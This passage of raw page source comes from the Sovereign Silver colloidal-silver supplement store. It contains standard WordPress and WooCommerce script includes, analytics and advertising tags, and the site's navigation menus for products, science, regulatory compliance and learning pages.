Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <!--[if lt IE 9]><link rel='stylesheet' id='twentyseventeen-ie8-css' href='https://sovereignsilver.com/wp-content/themes/sovereign-silver/assets/css/ie8.css?ver=1.0' type='text/css' media='all' /> <![endif]--><link rel='stylesheet' id='Fancybox-css-css' href='https://cdn.rawgit.com/noelboss/featherlight/1.7.13/release/featherlight.min.css' type='text/css' media='all' /> <script type='text/javascript' src='https://sovereignsilver.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_3f514685bf290840072d742774565d98.js?ver=5.1.1'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1'></script> <script type='text/javascript'>var my_ajax_object = {"ajax_url":"https:\/\/sovereignsilver.com\/wp-admin\/admin-ajax.php"};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_17c159e46e738b6c0ed320a1bdb14e89.js?ver=3.0.7'></script> <script type='text/javascript'>var PAKB = {"base_url":"https:\/\/sovereignsilver.com","ajaxurl":"https:\/\/sovereignsilver.com\/wp-admin\/admin-ajax.php","category":"1"};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_2bd6ea9e6917cf9d7f766ec992879722.js?ver=2.4.0'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_5f191590346194f7797f1b5d849a69f4.js?ver=1'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_15d206bd1e2793a1e8c387f532c41c1e.js?ver=1'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_b554a878cd1c765decedc9aabcb7b103.js?ver=1.9.2'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_5b7a4eee8ce61b6d9ba540e826c294ed.js?ver=1.9.2'></script> <script type='text/javascript'>var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/sovereignsilver.com\/cart\/","is_cart":"","cart_redirect_after_add":"yes"};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.2'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_902b7ca09549975e55e136fb0026df9a.js?ver=5.7'></script> <script type='text/javascript'>var ywaf = {"ajax_url":"\/\/sovereignsilver.com\/wp-admin\/admin-ajax.php?action=resend_paypal_email&_wpnonce=2c89df70aa"};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/yith-woocommerce-anti-fraud-premium/assets/js/ywaf-frontend.min.js?ver=5.1.1'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/themes/sovereign-silver/assets/js/html5.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript'>var wpApi = {"post_id":"10","root":"https:\/\/sovereignsilver.com\/wp-json\/","X-WP-Nonce":"857fcbc558","base_url":"https:\/\/sovereignsilver.com","theme_dir":"https:\/\/sovereignsilver.com\/wp-content\/themes\/sovereign-silver","user_id":"0","has_not_logged_in_yet":"","has_purchased_certification_package":"","has_completed_course_silver_expert":"","admin_ajax":"https:\/\/sovereignsilver.com\/wp-admin\/admin-ajax.php"};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_1661f99e25c93a8dd5e27c2a51344cdf.js?ver=1.135'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_f044770238c55ec6ac76004f70ea364f.js?ver=1.005'></script> <link rel='https://api.w.org/' href='https://sovereignsilver.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://sovereignsilver.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://sovereignsilver.com/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 5.1.1" /><meta name="generator" content="WooCommerce 3.6.2" /><link rel='shortlink' href='https://sovereignsilver.com/' /><link rel="alternate" type="application/json+oembed" href="https://sovereignsilver.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsovereignsilver.com%2F" /><link rel="alternate" type="text/xml+oembed" href="https://sovereignsilver.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsovereignsilver.com%2F&#038;format=xml" /> <script data-cfasync="false">window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={}; (function(d,s,a,b){a=d.createElement(s);b=d.getElementsByTagName(s)[0];a.async=1;a.src="https://static.addtoany.com/menu/page.js";b.parentNode.insertBefore(a,b);})(document,"script");</script> <script data-cfasync="false" type="text/javascript">// dataLayer.push({"pagePostType":"frontpage","pagePostType2":"single-page","pagePostAuthor":"captivation"});//</script> <script data-cfasync="false">// (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.'+'js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-TQB9V4X');//</script> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <script type='text/javascript'>!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js');</script> <script>fbq('init', '848176422050982', {}, { "agent": "woocommerce-3.6.2-1.9.12" }); fbq('track', 'PageView', { "source": "woocommerce", "version": "3.6.2", "pluginVersion": "1.9.12" }); document.addEventListener('DOMContentLoaded', function() { jQuery && jQuery(function($){ $('body').on('added_to_cart', function(event) { // Ajax action. $.get('?wc-ajax=fb_inject_add_to_cart_event', function(data) { $('head').append(data); }); }); }); }, false);</script> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://sovereignsilver.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.4.8.3 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <noscript><style type="text/css">.wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script>(function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:771657,hjsv:6}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');</script> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MPSDSN');</script> <script>// var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-1008745-3']); _gaq.push(['_trackPageview']); (function(){ var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); //</script> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-1008745-3"></script> <script>window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-1008745-3');</script> <script async src="https://www.googletagmanager.com/gtag/js?id=AW-821479075"></script> <script>window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'AW-821479075');</script> <script>window.fbAsyncInit = function(){ FB.init({ appId : '', status : true, cookie : true, xfbml : true, oauth : true }); FB.getLoginStatus(function(response){if (response.status == 'connected'){}}); }; (function(d){ var js, id = 'facebook-jssdk'; if (d.getElementById(id)) {return;} js = d.createElement('script'); js.id = id; js.async = true; js.src = "//connect.facebook.net/en_US/all.js"; d.getElementsByTagName('head')[0].appendChild(js); }(document)); function login(){ document.location.href="https://www.natural-immunogenics.com/facebookfree/customer/login/?referer=aHR0cHM6Ly9uYXR1cmFsLWltbXVub2dlbmljcy5jb20v"; } function logout(){ document.location.href="https://www.natural-immunogenics.com/facebookfree/customer/logout/"; } function greet(id){ FB.api('/me', function(response) { var src = 'https://graph.facebook.com/'+id+'/picture'; $('.welcome-msg')[0].insert('<img height="20" src="'+src+'"/>'); }); } function fblogin(){ FB.login(function(response){ (response.status == 'connected')? login() : window.location.reload(); }, {scope:'email,publish_stream'}); return false; }</script> <script>!function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '848176422050982'); fbq('track', 'PageView');</script> <noscript> <img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=848176422050982&ev=PageView&noscript=1" alt="facebook pixel" /> </noscript></head><body class="home page-template page-template-front-page page-template-front-page-php page page-id-10 home-page cookies-not-set woocommerce-no-js group-blog twentyseventeen-front-page has-header-image page-two-column colors-light wpb-js-composer js-comp-ver-5.7 vc_responsive"> <noscript> <iframe src="//www.googletagmanager.com/ns.html?id=GTM-MPSDSN" height="0" width="0" style="display:none;visibility:hidden"></iframe> </noscript><div class="main-wrapper"><div class="header row-fluid" style="padding-top:0;"><div id="breadcrumbs" class="container-fluid"><div class="breadcrumbs col-sm-12"></div></div><div class="nav-header row-fluid"><div class="container-fluid"><div class="nav-hd-left row-fluid"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1"> <span class="sr-only">&nbsp;</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button><div class="logo"><a href="https://sovereignsilver.com/"><img src="https://sovereignsilver.com/wp-content/uploads/2019/05/Sovereign-Silver-Logo-Transparent.png" alt="logo"></a></div></div><div class="nav-hd-right row-fluid"><div class="nav-menu"><div class="collapse navbar-collapse" id="full-size-menu"><ul id="menu-top-navigation" class=""><li id="menu-item-472" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-472"><a href="https://sovereignsilver.com/products/">Our Products</a><ul class="sub-menu"><li id="menu-item-23632" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23632"><a href="/products?=#bioactive">Bio-Active Silver Hydrosol™</a></li><li id="menu-item-23633" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23633"><a href="/products?=#silvergel">Silver First Aid Gel</a></li><li id="menu-item-23634" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23634"><a href="/products?=#kids">Sovereign Silver Kids</a></li><li id="menu-item-23635" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23635"><a href="/products?=#pets">Sovereign Silver Pets</a></li><li id="menu-item-2581" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2581"><a href="https://sovereignsilver.com/argentyn-23-for-practitioners/">Argentyn 23<sup>®</sup> – For Practitioners</a></li><li id="menu-item-135531" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-135531"><a href="https://sovereignsilver.com/lp/may-giveaway/">Current Promotions</a></li><li id="menu-item-312" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-312"><a href="https://sovereignsilver.com/store-locator/">Store Locator</a></li><li id="menu-item-23230" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23230"><a href="https://sovereignsilver.com/testimonials/">Your Stories</a></li></ul></li><li id="menu-item-179" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-179"><a href="https://sovereignsilver.com/our-story/">Our Story</a><ul class="sub-menu"><li id="menu-item-313" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-313"><a href="https://sovereignsilver.com/our-founder/">Our Founder</a></li><li id="menu-item-185" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-185"><a href="https://sovereignsilver.com/our-history/">Our History</a></li><li id="menu-item-180" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-180"><a href="https://sovereignsilver.com/our-mission/">Our Mission</a></li><li id="menu-item-27090" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27090"><a href="http://naturalimmunogenics.com">Natural Immunogenics Corporation</a></li><li id="menu-item-186" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-186"><a href="https://sovereignsilver.com/partners-and-links/">Partners and Links</a></li><li id="menu-item-133394" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-133394"><a href="https://sovereignsilver.com/category/news/">News</a></li></ul></li><li id="menu-item-316" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-316"><a href="https://sovereignsilver.com/our-science/">Our Science</a><ul class="sub-menu"><li id="menu-item-317" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-317"><a href="https://sovereignsilver.com/product-comparison-tool/">Comparison Tool</a></li><li id="menu-item-181" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-181"><a href="https://sovereignsilver.com/our-labs/">Our Labs</a></li><li id="menu-item-187" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-187"><a href="https://sovereignsilver.com/regulatory-compliance/">Regulatory Compliance</a><ul class="sub-menu"><li id="menu-item-455" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-455"><a href="https://sovereignsilver.com/regulatory-compliance/how-dietary-supplements-are-regulated/">How Dietary Supplements Are Regulated</a></li><li id="menu-item-2166" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2166"><a href="https://sovereignsilver.com/regulatory-compliance/what-we-cant-say-and-why/">What We Can/Can&#8217;t Say&#8230;And Why</a></li><li id="menu-item-2167" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2167"><a href="https://sovereignsilver.com/regulatory-compliance/how-supplements-are-regulated-in-canada/">How Dietary Supplements Are Regulated In Canada</a></li><li id="menu-item-452" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-452"><a href="https://sovereignsilver.com/regulatory-compliance/how-are-supplements-regulated-in-europe/">How Dietary Supplements Are Regulated in Europe</a></li><li id="menu-item-2164" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2164"><a href="https://sovereignsilver.com/regulatory-compliance/why-our-products-are-not-engineered-nanotechnology/">Why Our Products Are Not Engineered Nanotechnology</a></li></ul></li><li id="menu-item-318" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-318"><a href="https://sovereignsilver.com/weights-and-dimensions/">Weights and Dimensions</a></li></ul></li><li id="menu-item-188" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-188"><a href="https://sovereignsilver.com/the-learning-center/">The Learning Center</a><ul class="sub-menu"><li id="menu-item-191" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-191"><a href="https://sovereignsilver.com/silver101/">Silver 101</a><ul class="sub-menu"><li id="menu-item-23140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23140"><a href="https://sovereignsilver.com/silver101/the-silver-marketplace/">The Silver Marketplace</a></li><li id="menu-item-449" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-449"><a href="https://sovereignsilver.com/silver101/history-of-silver/">The History of Silver</a></li><li id="menu-item-331" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-331"><a href="https://sovereignsilver.com/silver101/types-of-silver/">Types of Silver</a></li><li id="menu-item-23137" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23137"><a href="https://sovereignsilver.com/benefits-of-silver/">Benefits of Silver</a></li><li id="menu-item-329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-329"><a href="https://sovereignsilver.com/silver101/safety-toxicity/">Safety &#038; Toxicity</a></li><li id="menu-item-330" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-330"><a href="https://sovereignsilver.com/silver101/choosing-the-right-silver/">Choosing the Right Silver</a></li><li id="menu-item-328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-328"><a href="https://sovereignsilver.com/silver101/making-your-own/">Homemade Silver?</a></li></ul></li><li id="menu-item-193" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-193"><a href="https://sovereignsilver.com/myths-about-silver/">Myths About Silver</a></li><li id="menu-item-194" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-194"><a href="https://sovereignsilver.com/faqs/">FAQs</a></li><li id="menu-item-319" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-319"><a href="https://sovereignsilver.com/blog/">SOVEREIGN LIFE <sup>TM</sup><br /> Our blog to help you live your best sovereign life</a></li><li id="menu-item-23151" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23151"><a href="https://sovereignsilver.com/silver-hydrosol-in-cosmetics/">Silver Hydrosol in Cosmetics</a></li><li id="menu-item-2109" class="menu-item menu-item-type-post_type menu-item-object-knowledgebase menu-item-2109"><a href="https://sovereignsilver.com/knowledgebase/glossary/">Glossary</a></li><li id="menu-item-2110" class="menu-item menu-item-type-taxonomy menu-item-object-knowledgebase_category menu-item-2110"><a href="https://sovereignsilver.com/wiki/knowledge_library/">Knowledge Library (Registration Required)</a></li><li id="menu-item-133955" class="menu-item menu-item-type-post_type menu-item-object-sfwd-courses menu-item-133955"><a href="https://sovereignsilver.com/courses/the-silver-expert-certification-course/">The Silver Expert Certification Course</a></li><li id="menu-item-2471" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2471"><a href="https://sovereignsilver.com/contact-us/">Contact Us</a></li></ul></li><li id="menu-item-2430" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2430"><a href="https://sovereignsilver.com/store-locator/"><i class="_mi _before fa fa-map-marker" aria-hidden="true" style="vertical-align:text-bottom;"></i><span>Store Locator</span></a></li></ul></div><div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1"><ul id="menu-top-navigation-1" class=""><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-472"><a href="https://sovereignsilver.com/products/">Our Products</a><ul class="sub-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23632"><a href="/products?=#bioactive">Bio-Active Silver Hydrosol™</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23633"><a href="/products?=#silvergel">Silver First Aid Gel</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23634"><a href="/products?=#kids">Sovereign Silver Kids</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23635"><a href="/products?=#pets">Sovereign Silver Pets</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2581"><a href="https://sovereignsilver.com/argentyn-23-for-practitioners/">Argentyn 23<sup>®</sup> – For Practitioners</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-135531"><a href="https://sovereignsilver.com/lp/may-giveaway/">Current Promotions</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-312"><a href="https://sovereignsilver.com/store-locator/">Store Locator</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23230"><a href="https://sovereignsilver.com/testimonials/">Your Stories</a></li></ul></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-179"><a href="https://sovereignsilver.com/our-story/">Our Story</a><ul class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-313"><a href="https://sovereignsilver.com/our-founder/">Our Founder</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-185"><a href="https://sovereignsilver.com/our-history/">Our History</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-180"><a href="https://sovereignsilver.com/our-mission/">Our Mission</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27090"><a href="http://naturalimmunogenics.com">Natural Immunogenics Corporation</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-186"><a href="https://sovereignsilver.com/partners-and-links/">Partners and Links</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-133394"><a href="https://sovereignsilver.com/category/news/">News</a></li></ul></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-316"><a href="https://sovereignsilver.com/our-science/">Our Science</a><ul class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-317"><a href="https://sovereignsilver.com/product-comparison-tool/">Comparison Tool</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-181"><a href="https://sovereignsilver.com/our-labs/">Our Labs</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-187"><a href="https://sovereignsilver.com/regulatory-compliance/">Regulatory Compliance</a><ul class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-455"><a href="https://sovereignsilver.com/regulatory-compliance/how-dietary-supplements-are-regulated/">How Dietary Supplements Are Regulated</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2166"><a href="https://sovereignsilver.com/regulatory-compliance/what-we-cant-say-and-why/">What We Can/Can&#8217;t Say&#8230;And Why</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2167"><a href="https://sovereignsilver.com/regulatory-compliance/how-supplements-are-regulated-in-canada/">How Dietary Supplements Are Regulated In Canada</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-452"><a href="https://sovereignsilver.com/regulatory-compliance/how-are-supplements-regulated-in-europe/">How Dietary Supplements Are Regulated in Europe</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2164"><a href="https://sovereignsilver.com/regulatory-compliance/why-our-products-are-not-engineered-nanotechnology/">Why Our Products Are Not Engineered Nanotechnology</a></li></ul></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-318"><a href="https://sovereignsilver.com/weights-and-dimensions/">Weights and Dimensions</a></li></ul></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-188"><a href="https://sovereignsilver.com/the-learning-center/">The Learning Center</a><ul class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-191"><a href="https://sovereignsilver.com/silver101/">Silver 101</a><ul class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23140"><a href="https://sovereignsilver.com/silver101/the-silver-marketplace/">The Silver Marketplace</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-449"><a href="https://sovereignsilver.com/silver101/history-of-silver/">The History of Silver</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-331"><a href="https://sovereignsilver.com/silver101/types-of-silver/">Types of Silver</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23137"><a href="https://sovereignsilver.com/benefits-of-silver/">Benefits of Silver</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-329"><a href="https://sovereignsilver.com/silver101/safety-toxicity/">Safety &#038; Toxicity</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-330"><a href="https://sovereignsilver.com/silver101/choosing-the-right-silver/">Choosing the Right Silver</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-328"><a href="https://sovereignsilver.com/silver101/making-your-own/">Homemade Silver?</a></li></ul></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-193"><a href="https://sovereignsilver.com/myths-about-silver/">Myths About Silver</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-194"><a href="https://sovereignsilver.com/faqs/">FAQs</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-319"><a href="https://sovereignsilver.com/blog/">SOVEREIGN LIFE <sup>TM</sup><br /> Our blog to help you live your best sovereign life</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23151"><a href="https://sovereignsilver.com/silver-hydrosol-in-cosmetics/">Silver Hydrosol in Cosmetics</a></li><li class="menu-item menu-item-type-post_type menu-item-object-knowledgebase menu-item-2109"><a href="https://sovereignsilver.com/knowledgebase/glossary/">Glossary</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-knowledgebase_category menu-item-2110"><a href="https://sovereignsilver.com/wiki/knowledge_library/">Knowledge Library (Registration Required)</a></li><li class="menu-item menu-item-type-post_type menu-item-object-sfwd-courses menu-item-133955"><a href="https://sovereignsilver.com/courses/the-silver-expert-certification-course/">The Silver Expert Certification Course</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2471"><a href="https://sovereignsilver.com/contact-us/">Contact Us</a></li></ul></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2430"><a href="https://sovereignsilver.com/store-locator/"><i class="_mi _before fa fa-map-marker" aria-hidden="true" style="vertical-align:text-bottom;"></i><span>Store Locator</span></a></li></ul></div></div><div class="nav-btn"><div class="shopping-cart-holder"><div class="shopping-cart-inner"> <a itemprop="url" class="header-cart" href="/cart/"> <i title="cart" class="cart-icon fa fa-shopping-cart"></i> <span id="cart_contents_count" class="cart-number">0</span> </a></div></div> <a class="search-opener" href="#search"> <span class="search-opener-wrapper"><i title="search" class="icon-search fa fa-search "></i></span></a><div class="user-login-btn"><div class="dropdown"> <a href="#" data-toggle="dropdown"> <i class="fa fa-user" aria-hidden="true"></i></a><ul class="dropdown-menu"><li><a href="https://sovereignsilver.com/new-customer-registration/">Register/Login</a></li></ul></div></div></div><div id="search-open"><div class="hs-container"><div class="hs-content"> <button type="button" class="close"><span class="icon_close"></span></button><form role="search" method="get" id="searchform" class="search-open-form" action="https://sovereignsilver.com/"><input type="search" value="" name="s" placeholder="Search for..."><button type="submit" class="search-submit"><span class="icon_search "></span></button></form></div></div></div></div></div></div></div><div class="container-wrapper row-fluid"><div class="row-fluid"><div class="mbanner"><div id="rev_slider_1_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px 